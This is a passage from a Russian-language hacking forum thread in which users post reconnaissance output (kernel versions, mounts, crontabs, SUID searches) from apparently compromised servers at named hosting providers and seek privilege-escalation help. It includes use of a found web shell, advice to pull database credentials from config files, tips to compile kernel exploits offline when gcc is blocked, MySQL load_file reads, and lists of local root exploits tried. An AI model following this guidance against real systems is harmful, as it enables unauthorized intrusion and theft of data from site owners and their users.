ls -la /boot
Код:
total 39154
drwxr-xr-x  5 root root    5120 Apr  8 13:07 .
drwxr-xr-x 28 root root    4096 Aug 10 03:00 ..
-rw-r--r--  1 root root     163 Jan  6  2011 .vmlinuz-2.6.18-194.32.1.el5.hmac
-rw-r--r--  1 root root     158 Apr  2  2010 .vmlinuz-2.6.18-194.el5.hmac
-rw-r--r--  1 root root     166 Sep 26  2013 .vmlinuz-2.6.18-348.18.1.el5PAE.hma
c
-rw-r--r--  1 root root     165 Dec  5  2013 .vmlinuz-2.6.18-371.3.1.el5PAE.hmac

-rw-r--r--  1 root root     165 Jun 11  2014 .vmlinuz-2.6.18-371.9.1.el5PAE.hmac

-rw-r--r--  1 root root     161 Sep 17  2014 .vmlinuz-2.6.18-398.el5PAE.hmac
-rw-r--r--  1 root root     161 Apr  7 20:53 .vmlinuz-2.6.18-404.el5PAE.hmac
-rw-r--r--  1 root root  971511 Jan  6  2011 System.map-2.6.18-194.32.1.el5
-rw-r--r--  1 root root  967675 Apr  2  2010 System.map-2.6.18-194.el5
-rw-r--r--  1 root root  993118 Sep 26  2013 System.map-2.6.18-348.18.1.el5PAE
-rw-r--r--  1 root root  993780 Dec  5  2013 System.map-2.6.18-371.3.1.el5PAE
-rw-r--r--  1 root root  993835 Jun 11  2014 System.map-2.6.18-371.9.1.el5PAE
-rw-r--r--  1 root root  993998 Sep 17  2014 System.map-2.6.18-398.el5PAE
-rw-r--r--  1 root root  994152 Apr  7 20:53 System.map-2.6.18-404.el5PAE
-rw-r--r--  1 root root   69598 Jan  6  2011 config-2.6.18-194.32.1.el5
-rw-r--r--  1 root root   69593 Apr  2  2010 config-2.6.18-194.el5
-rw-r--r--  1 root root   70337 Sep 26  2013 config-2.6.18-348.18.1.el5PAE
-rw-r--r--  1 root root   70357 Dec  5  2013 config-2.6.18-371.3.1.el5PAE
-rw-r--r--  1 root root   70357 Jun 11  2014 config-2.6.18-371.9.1.el5PAE
-rw-r--r--  1 root root   70353 Sep 17  2014 config-2.6.18-398.el5PAE
-rw-r--r--  1 root root   70353 Apr  7 20:53 config-2.6.18-404.el5PAE
drwxr-xr-x  2 root root    1024 May  4  2010 extlinux
drwxr-xr-x  2 root root    1024 Apr  8 13:07 grub
-rw-------  1 root root 2599913 Jan 25  2011 initrd-2.6.18-194.32.1.el5.img
-rw-------  1 root root 2569559 Jan 25  2011 initrd-2.6.18-194.el5.img
-rw-------  1 root root 2615526 Oct 14  2013 initrd-2.6.18-348.18.1.el5PAE.img
-rw-------  1 root root 2615834 Jan 24  2014 initrd-2.6.18-371.3.1.el5PAE.img
-rw-------  1 root root 2616679 Jun 12  2014 initrd-2.6.18-371.9.1.el5PAE.img
-rw-------  1 root root 2616919 Dec  2  2014 initrd-2.6.18-398.el5PAE.img
-rw-------  1 root root 2616967 Apr  8 13:07 initrd-2.6.18-404.el5PAE.img
drwx------  2 root root   12288 Jan  1  2009 lost+found
-rw-r--r--  1 root root   80032 Mar 12  2009 message
-rw-r--r--  1 root root  111346 Jan  6  2011 symvers-2.6.18-194.32.1.el5.gz
-rw-r--r--  1 root root  110979 Apr  2  2010 symvers-2.6.18-194.el5.gz
-rw-r--r--  1 root root  117369 Sep 26  2013 symvers-2.6.18-348.18.1.el5PAE.gz
-rw-r--r--  1 root root  117471 Dec  5  2013 symvers-2.6.18-371.3.1.el5PAE.gz
-rw-r--r--  1 root root  117487 Jun 11  2014 symvers-2.6.18-371.9.1.el5PAE.gz
-rw-r--r--  1 root root  117549 Sep 17  2014 symvers-2.6.18-398.el5PAE.gz
-rw-r--r--  1 root root  117561 Apr  7 20:53 symvers-2.6.18-404.el5PAE.gz
-rw-r--r--  1 root root 1877108 Jan  6  2011 vmlinuz-2.6.18-194.32.1.el5
-rw-r--r--  1 root root 1875796 Apr  2  2010 vmlinuz-2.6.18-194.el5
-rw-r--r--  1 root root 1908212 Sep 26  2013 vmlinuz-2.6.18-348.18.1.el5PAE
-rw-r--r--  1 root root 1909108 Dec  5  2013 vmlinuz-2.6.18-371.3.1.el5PAE
-rw-r--r--  1 root root 1909140 Jun 11  2014 vmlinuz-2.6.18-371.9.1.el5PAE
-rw-r--r--  1 root root 1910164 Sep 17  2014 vmlinuz-2.6.18-398.el5PAE
-rw-r--r--  1 root root 1910324 Apr  7 20:53 vmlinuz-2.6.18-404.el5PAE
mount
Код:
/dev/md3 on / type ext3 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/md4 on /tmp type ext3 (rw,noexec,nosuid,nodev,noatime)
/dev/md2 on /boot type ext3 (rw)
/dev/md1 on /var type ext3 (rw,noatime)
/dev/md0 on /hsphere type ext3 (rw,noatime,usrquota,data=writeback)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
df -h
Код:
Filesystem            Size  Used Avail Use% Mounted on
/dev/md3               15G  6.8G  7.1G  49% /
/dev/md4              4.9G  2.6G  2.1G  56% /tmp
/dev/md2              198M   46M  143M  25% /boot
/dev/md1              436G   21G  393G   6% /var
/dev/md0              417G  135G  260G  35% /hsphere
tmpfs                 5.9G     0  5.9G   0% /dev/shm
cat /etc/issue
Код:
CentOS release 5.5 (Final
Kernel \r on an \m
cat /proc/version
Код:
Linux version 2.6.18-371.3.1.el5PAE (mockbuild@builder10.centos.org) (gcc versio
n 4.1.2 20080704 (Red Hat 4.1.2-54)) #1 SMP Thu Dec 5 13:29:20 EST 2013
cat /proc/sys/vm/mmap_min_addr
4096
Использую этот эксполит
https://www.exploit-db.com/exploits/10613/
Но при его копиляции пишет что недостаточно прав gcc, можно это обойти ?gcc установлены права 750
И вопрос ,я правельный экполит выбрал?? Ешё только учусь.
1. Вы используете ядерный сплойт для 2009 года, а какого года ваша сборка? 0_o

2. Нет прав на gcc, компилируйте сплойт на локальной машине.

3. Что-то ядерное под вашу машину вряд ли есть, посмотрите/попробуйте http://www.openwall.com/lists/oss-se.../2015/07/23/16
 
Ответить с цитированием

  #594  
Старый 13.08.2015, 21:11
Xsite
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
4776

Репутация: 0
По умолчанию
Ребят подскажите пожалуйста ,чисто случайно наткнулся на уже залитый шел на сайте

Но он не дает ни заливать файлы ,ни читать

http://hkar.ru/D5S3

http://hkar.ru/D5S4

Код:
Linux ns5.hiwit.net 3.13.0-61-generic #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
total 34093
drwxr-xr-x  3 root root      400 Aug 11 04:52 .
drwxr-xr-x 24 root root      640 Aug 11 04:52 ..
-rw-------  1 root root  3391819 Jul 29 14:35 System.map-3.13.0-61-generic
-rw-r--r--  1 root root  1165129 Jul 29 14:35 abi-3.13.0-61-generic
-rw-r--r--  1 root root   165763 Jul 29 14:35 config-3.13.0-61-generic
drwxr-xr-x  2 root root      472 Aug 11 04:52 grub
-rw-r--r--  1 root root 23777827 Aug 11 04:41 initrd.img-3.13.0-61-generic
-rw-r--r--  1 root root   176500 Mar 12  2014 memtest86+.bin
-rw-r--r--  1 root root   178176 Mar 12  2014 memtest86+.elf
-rw-r--r--  1 root root   178680 Mar 12  2014 memtest86+_multiboot.bin
-rw-------  1 root root  5822208 Jul 29 14:35 vmlinuz-3.13.0-61-generic
При команде lls -la --full-time /lib (64) тишина
/dev/sda1 on / type reiserfs (rw,relatime,notail)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/cgroup type tmpfs (rw)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
none on /sys/fs/pstore type pstore (rw)
/dev/sda2 on /home type reiserfs (rw,relatime)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
Filesystem      Size  Used Avail Use% Mounted on
/dev/sda1       9.4G  4.4G  5.0G  47% /
none            4.0K     0  4.0K   0% /sys/fs/cgroup
udev            3.9G   12K  3.9G   1% /dev
tmpfs           799M  496K  798M   1% /run
none            5.0M     0  5.0M   0% /run/lock
none            3.9G     0  3.9G   0% /run/shm
none            100M     0  100M   0% /run/user
/dev/sda2       141G   51G   90G  37% /home
Ubuntu 14.04.3 LTS \n \l
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

ls -la cron.d, cron.hourly, cron.monthly, cron.weekly ничего не выводит

Linux version 3.13.0-61-generic (buildd@lgw01-50) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015
65536
/home/ah42713/web/www
ls -la /usr/bin/staprun ничего не выводит
find / -type f -perm -u+s -exec ls -la {} ; 2>/dev/null тишина
Тут даже больше вопрос ,как вытащить базу , а уже потом по рутать по возможности
 
Ответить с цитированием

  #595  
Старый 16.08.2015, 15:20
powerOfthemind
Познающий
Регистрация: 31.07.2015
Сообщений: 41
Провел на форуме:
9212

Репутация: 1
По умолчанию
Цитата:
Сообщение от Xsite  

Ребят подскажите пожалуйста ,чисто случайно наткнулся на уже залитый шел на сайте
Но он не дает ни заливать файлы ,ни читать
http://hkar.ru/D5S3
http://hkar.ru/D5S4
Код:
Linux ns5.hiwit.net 3.13.0-61-generic #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
total 34093
drwxr-xr-x  3 root root      400 Aug 11 04:52 .
drwxr-xr-x 24 root root      640 Aug 11 04:52 ..
-rw-------  1 root root  3391819 Jul 29 14:35 System.map-3.13.0-61-generic
-rw-r--r--  1 root root  1165129 Jul 29 14:35 abi-3.13.0-61-generic
-rw-r--r--  1 root root   165763 Jul 29 14:35 config-3.13.0-61-generic
drwxr-xr-x  2 root root      472 Aug 11 04:52 grub
-rw-r--r--  1 root root 23777827 Aug 11 04:41 initrd.img-3.13.0-61-generic
-rw-r--r--  1 root root   176500 Mar 12  2014 memtest86+.bin
-rw-r--r--  1 root root   178176 Mar 12  2014 memtest86+.elf
-rw-r--r--  1 root root   178680 Mar 12  2014 memtest86+_multiboot.bin
-rw-------  1 root root  5822208 Jul 29 14:35 vmlinuz-3.13.0-61-generic
При команде lls -la --full-time /lib (64) тишина
/dev/sda1 on / type reiserfs (rw,relatime,notail)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/cgroup type tmpfs (rw)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
none on /sys/fs/pstore type pstore (rw)
/dev/sda2 on /home type reiserfs (rw,relatime)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
Filesystem      Size  Used Avail Use% Mounted on
/dev/sda1       9.4G  4.4G  5.0G  47% /
none            4.0K     0  4.0K   0% /sys/fs/cgroup
udev            3.9G   12K  3.9G   1% /dev
tmpfs           799M  496K  798M   1% /run
none            5.0M     0  5.0M   0% /run/lock
none            3.9G     0  3.9G   0% /run/shm
none            100M     0  100M   0% /run/user
/dev/sda2       141G   51G   90G  37% /home
Ubuntu 14.04.3 LTS \n \l
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

ls -la cron.d, cron.hourly, cron.monthly, cron.weekly ничего не выводит

Linux version 3.13.0-61-generic (buildd@lgw01-50) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015
65536
/home/ah42713/web/www
ls -la /usr/bin/staprun ничего не выводит
find / -type f -perm -u+s -exec ls -la {} ; 2>/dev/null тишина
Тут даже больше вопрос ,как вытащить базу , а уже потом по рутать по возможности
По пробуй скачать конфиги (config.php, conn.php и так далее) базы,потом через шел зайти или myadmin найти что врятли получиться.
 
Ответить с цитированием

  #596  
Старый 30.08.2015, 12:00
avonar
Новичок
Регистрация: 19.05.2008
Сообщений: 1
Провел на форуме:
5816

Репутация: 0
По умолчанию
Везде упоминают о каком-то старом баге, который позволял эскалировать привилегии в Active directory, о чем может идти речь?
 
Ответить с цитированием

  #597  
Старый 14.09.2015, 07:24
Valer4ik
Новичок
Регистрация: 25.07.2015
Сообщений: 7
Провел на форуме:
2532

Репутация: 0
По умолчанию
Есть root доступ в mysql и такой серв

Код:
:/var/www/user/data $ uname -a
Linux usertoys.com.ua 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u1 x86_64 GNU/Linux
:/var/www/user/data $ ls -la /boot
total 15161
drwxr-xr-x  4 root root     1024 May 12 13:06 .
drwxr-xr-x 23 root root     4096 Jul 30 06:32 ..
-rw-r--r--  1 root root  2114623 Apr 25 03:31 System.map-3.2.0-4-amd64
-rw-r--r--  1 root root   129281 Apr 25 03:31 config-3.2.0-4-amd64
drwxr-xr-x  3 root root     5120 May 12 13:07 grub
-rw-r--r--  1 root root 10347571 May 12 13:06 initrd.img-3.2.0-4-amd64
drwxr-xr-x  2 root root    12288 May 12 13:01 lost+found
-rw-r--r--  1 root root  2842400 Apr 25 03:22 vmlinuz-3.2.0-4-amd64
:/var/www/user/data $ ls -la --full-time /lib
total 264
drwxr-xr-x 13 root root  4096 2015-05-16 00:32:27.064340794 +0300 .
drwxr-xr-x 23 root root  4096 2015-07-30 06:32:55.250270001 +0300 ..
lrwxrwxrwx  1 root root    21 2015-05-16 00:32:27.052340698 +0300 cpp -> /etc/alternatives/cpp
drwxr-xr-x  2 root root  4096 2015-05-12 13:05:25.243433001 +0300 discover
drwxr-xr-x  7 root root  4096 2015-05-12 13:03:48.463433001 +0300 firmware
drwxr-xr-x  2 root root  4096 2015-05-12 13:03:13.543433001 +0300 init
-rwxr-xr-x  1 root root 72184 2012-11-12 18:58:05.000000000 +0200 klibc-2xtYrByCrj5OEwaInv4tMSjej98.so
lrwxrwxrwx  1 root root    17 2013-03-01 15:55:02.000000000 +0200 libip4tc.so.0 -> libip4tc.so.0.1.0
-rw-r--r--  1 root root 31384 2013-03-01 15:55:04.000000000 +0200 libip4tc.so.0.1.0
lrwxrwxrwx  1 root root    17 2013-03-01 15:55:02.000000000 +0200 libip6tc.so.0 -> libip6tc.so.0.1.0
-rw-r--r--  1 root root 31448 2013-03-01 15:55:04.000000000 +0200 libip6tc.so.0.1.0
lrwxrwxrwx  1 root root    15 2013-03-01 15:55:02.000000000 +0200 libipq.so.0 -> libipq.so.0.0.0
-rw-r--r--  1 root root 10544 2013-03-01 15:55:04.000000000 +0200 libipq.so.0.0.0
lrwxrwxrwx  1 root root    16 2013-03-01 15:55:02.000000000 +0200 libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r--  1 root root  5928 2013-03-01 15:55:04.000000000 +0200 libiptc.so.0.0.0
lrwxrwxrwx  1 root root    19 2013-03-01 15:55:02.000000000 +0200 libxtables.so.7 -> libxtables.so.7.0.0
-rw-r--r--  1 root root 47824 2013-03-01 15:55:04.000000000 +0200 libxtables.so.7.0.0
drwxr-xr-x  3 root root  4096 2015-05-12 13:03:13.911433001 +0300 lsb
drwxr-xr-x  2 root root  4096 2015-05-12 13:03:25.155433001 +0300 modprobe.d
drwxr-xr-x  3 root root  4096 2015-05-12 13:03:59.007433001 +0300 modules
drwxr-xr-x  3 root root  4096 2015-05-12 13:03:27.079433001 +0300 systemd
drwxr-xr-x 15 root root  4096 2015-05-12 13:03:06.719433001 +0300 terminfo
drwxr-xr-x  5 root root  4096 2015-05-12 13:03:27.463433001 +0300 udev
drwxr-xr-x  4 root root 12288 2015-05-29 10:37:18.893494371 +0300 x86_64-linux-gnu
drwxr-xr-x  2 root root  4096 2015-05-12 13:03:24.923433001 +0300 xtables
:/var/www/user/data $ mount
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=746519,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=598420k,mode=755)
/dev/disk/by-uuid/8038203e-749a-4f44-bc0c-032c3bb78470 on / type ext4 (rw,relatime,errors=remount-ro,user_xattr,barrier=1,data=ordered,usrquota,grpquota)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /run/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=1301280k)
/dev/vda1 on /boot type ext2 (rw,relatime,errors=continue)
rpc_pipefs on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw,relatime)
:/var/www/user/data $ df -h
Filesystem                                              Size  Used Avail Use% Mounted on
rootfs                                                   58G   26G   29G  48% /
udev                                                     10M     0   10M   0% /dev
tmpfs                                                   585M  232K  585M   1% /run
/dev/disk/by-uuid/8038203e-749a-4f44-bc0c-032c3bb78470   58G   26G   29G  48% /
tmpfs                                                   5.0M     0  5.0M   0% /run/lock
tmpfs                                                   1.3G     0  1.3G   0% /run/shm
/dev/vda1                                                89M   17M   67M  21% /boot
:/var/www/user/data $ cat /etc/issue
Debian GNU/Linux 7 \n \l
:/var/www/user/data $ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
:/var/www/user/data $ ls -la /etc/cron.d
total 20
drwxr-xr-x  2 root root 4096 Jun 15 13:23 .
drwxr-xr-x 93 root root 4096 Aug 28 09:27 ..
-rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
-rw-r--r--  1 root root  254 Jun 13  2012 awstats
-rw-r--r--  1 root root  510 Mar 25 10:47 php5
:/var/www/user/data $ ls -la /etc/cron.hourly
total 12
drwxr-xr-x  2 root root 4096 May 12 13:03 .
drwxr-xr-x 93 root root 4096 Aug 28 09:27 ..
-rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
:/var/www/user/data $ la -la /etc/cron.monthly
sh: 1: la: not found
:/var/www/user/data $ la -la /etc/cron.weekly
sh: 1: la: not found
:/var/www/user/data $ cat /etc/cron.hourly/*
cat: /etc/cron.hourly/*: No such file or directory
:/var/www/user/data $ cat /etc/cron.monthly/*
cat: /etc/cron.monthly/*: No such file or directory
:/var/www/user/data $ cat /etc/cron.weekly/*
#!/bin/sh
#
# man-db cron weekly

set -e

iosched_idle=
# Don't try to change I/O priority in a vserver or OpenVZ.
if ! egrep -q '(envID|VxID):.*[1-9]' /proc/self/status && \
   ([ ! -d /proc/vz ] || [ -d /proc/bc ]); then
    dpkg_version="$(dpkg-query -W -f '${Version}' dpkg 2>/dev/null)"
    if dpkg --compare-versions "$dpkg_version" ge 1.15.0; then
        iosched_idle='--iosched idle'
    fi
fi

if ! [ -d /var/cache/man ]; then
    # Recover from deletion, per FHS.
    mkdir -p /var/cache/man
    chown man:root /var/cache/man || true
    chmod 2755 /var/cache/man
fi

# regenerate man database
if [ -x /usr/bin/mandb ]; then
    # --pidfile /dev/null so it always starts; mandb isn't really a daemon,
    # but we want to start it like one.
    start-stop-daemon --start --pidfile /dev/null \
                      --startas /usr/bin/mandb --oknodo --chuid man \
                      $iosched_idle \
                      -- --quiet
fi

exit 0
#!/bin/sh

RKHUNTER=/usr/bin/rkhunter

test -x $RKHUNTER || exit 0

# source our config
. /etc/default/rkhunter

case "$CRON_DB_UPDATE" in
        [YyTt]*)

                if [ ! -x /usr/bin/wget ] && [ ! -x /usr/bin/curl ] && [ ! -x /usr/bin/links ] && \
                   [ ! -x /usr/bin/elinks ] && [ ! -x /usr/bin/lynx ]; then
                     echo "No tool with which to download rkhunter updates was found on your system. Please install wget, curl, (e)links or lynx"
                     exit 1
                fi

                OUTFILE=`mktemp` || exit 1

                case "$DB_UPDATE_EMAIL" in
                    [YyTt]*)
                        (
                        echo "Subject: [rkhunter] $(hostname -f) - Weekly database update"
                        echo "To: $REPORT_EMAIL"
                        echo ""
                        $RKHUNTER --versioncheck --nocolors --appendlog
                        $RKHUNTER --update --nocolors --appendlog
                        ) | /usr/sbin/sendmail $REPORT_EMAIL
                    ;;
                    *)
                        $RKHUNTER --versioncheck --appendlog 1>/dev/null 2>$OUTFILE
                        $RKHUNTER --update --appendlog 1>/dev/null 2>>$OUTFILE
                    ;;
                esac

                if [ -s "$OUTFILE" ]; then
                    (
                    echo "Subject: [rkhunter] $(hostname -f) - Weekly rkhunter database update"
                    echo "To: $REPORT_EMAIL"
                    echo ""
                    cat $OUTFILE
                    ) | /usr/sbin/sendmail $REPORT_EMAIL
                fi
                rm -f $OUTFILE
        ;;

        *)
                exit 0
        ;;
esac
:/var/www/user/data $ cat /proc/version
Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.68-1+deb7u1
:/var/www/user/data $ cat /proc/sys/vm/mmap_min_addr
65536
:/var/www/user/data $ pwd
/var/www/user/data
:/var/www/user/data $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
:/var/www/user/data $ id
uid=500(user) gid=500(user) groups=500(user),1000(mgrsecure)
:/var/www/user/data $
пробовал читать файлы из mysql но много не прочитал

select load_file('');

И из эксплоитов пробовал, (чекер показал)

- Kernel ia32syscall Emulation Privilege Escalation Language=c

- Sendpage Local Privilege Escalation Language=ruby**

- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) Language=c

- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit Language=c

- open-time Capability file_ns_capable() Privilege Escalation Language=c

- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability Language=c
 
Ответить с цитированием

  #598  
Старый 16.09.2015, 14:09
ghost8
Участник форума
Регистрация: 29.05.2015
Сообщений: 110
Провел на форуме:
37430

Репутация: 0
По умолчанию
 
Ответить с цитированием

  #599  
Старый 18.09.2015, 13:43
Valer4ik
Новичок
Регистрация: 25.07.2015
Сообщений: 7
Провел на форуме:
2532

Репутация: 0
По умолчанию
Цитата:
Сообщение от ghost8  
Я пытался, но на серве нет fusermout
 
Ответить с цитированием

  #600  
Старый 08.10.2015, 22:06
Bezlishke
Новичок
Регистрация: 18.05.2015
Сообщений: 26
Провел на форуме:
9828

Репутация: 3
По умолчанию
Такие дела.пробывал связку. Но меня послало.

Код:
$ uname -a
Linux fortuna.timeweb.ru 3.10.82-timeweb #1 SMP Fri Jul 3 10:11:34 MSK 2015 x86_64 x86_64 x86_64 GNU/Linux
$ ls -la /boot
total 153444
drwxr-xr-x  3 root root     4096 Oct  8 06:28 .
drwxr-xr-x 28 root root     4096 Jul 21 06:26 ..
-rw-r--r--  1 root root  3210565 Aug 26  2014 System.map-3.10.53-timeweb
-rw-r--r--  1 root root  3210844 Oct 16  2014 System.map-3.10.58-timeweb
-rw-r--r--  1 root root  3213729 Mar  3  2015 System.map-3.10.70-timeweb
-rw-r--r--  1 root root  3213988 Jul  3 10:49 System.map-3.10.82-timeweb
-rw-r--r--  1 root root  3214012 Oct  7 13:05 System.map-3.10.90-timeweb
-rw-r--r--  1 root root  2911687 May 20  2013 System.map-3.2.45-timeweb
-rw-r--r--  1 root root   132942 Aug 26  2014 config-3.10.53-timeweb
-rw-r--r--  1 root root   133622 Oct 16  2014 config-3.10.58-timeweb
-rw-r--r--  1 root root   134094 Mar  3  2015 config-3.10.70-timeweb
-rw-r--r--  1 root root   134094 Jul  3 10:00 config-3.10.82-timeweb
-rw-r--r--  1 root root   134094 Oct  7 12:17 config-3.10.90-timeweb
-rw-r--r--  1 root root   129458 May 20  2013 config-3.2.45-timeweb
drwxr-xr-x  3 root root    12288 Oct  8 06:28 grub
-rw-r--r--  1 root root 16856878 Sep 16  2014 initrd.img-3.10.53-timeweb
-rw-r--r--  1 root root 17273047 Feb 18  2015 initrd.img-3.10.58-timeweb
-rw-r--r--  1 root root 17273539 Mar 18  2015 initrd.img-3.10.70-timeweb
-rw-r--r--  1 root root 17273177 Sep 29 06:25 initrd.img-3.10.82-timeweb
-rw-r--r--  1 root root 17272293 Oct  8 06:28 initrd.img-3.10.90-timeweb
-rw-r--r--  1 root root 15767803 Sep 18  2013 initrd.img-3.2.45-timeweb
-rw-r--r--  1 root root   176764 Nov 27  2011 memtest86+.bin
-rw-r--r--  1 root root   178944 Nov 27  2011 memtest86+_multiboot.bin
-rw-r--r--  1 root root  5939488 Aug 26  2014 vmlinuz-3.10.53-timeweb
-rw-r--r--  1 root root  5941120 Oct 16  2014 vmlinuz-3.10.58-timeweb
-rw-r--r--  1 root root  5948224 Mar  3  2015 vmlinuz-3.10.70-timeweb
-rw-r--r--  1 root root  5949952 Jul  3 10:49 vmlinuz-3.10.82-timeweb
-rw-r--r--  1 root root  5951264 Oct  7 13:05 vmlinuz-3.10.90-timeweb
-rw-r--r--  1 root root  5480816 May 20  2013 vmlinuz-3.2.45-timeweb
$ lls -la --full-time /lib64

$ lls -la --full-time /lib

$ mount
/dev/sda1 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
none on /tmp type tmpfs (rw,noexec,nosuid,nodev,noatime,size=4g)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /var/spool/exim4 type tmpfs (rw,noexec,nosuid,nodev,noatime,size=1g)
/dev/drbd0 on /home type ext4 (rw,nosuid,noatime,nodiratime,usrjquota=aquota.user,jqfmt=vfsv0,usrquota,discard,_netdev)
//172.16.0.30/homes on /mnt/backup type cifs (rw,noexec,nosuid,nodev)
$ df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/sda1        46G   24G   20G  55% /
udev             32G   12K   32G   1% /dev
none            4.0G  579M  3.5G  15% /tmp
tmpfs           6.3G  336K  6.3G   1% /run
none            5.0M     0  5.0M   0% /run/lock
none             32G   24K   32G   1% /run/shm
none            1.0G  7.7M 1017M   1% /var/spool/exim4
/dev/drbd0      1.5T  1.3T  170G  88% /home
$ cat /etc/issue
Ubuntu 12.04.5 LTS \n \l

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
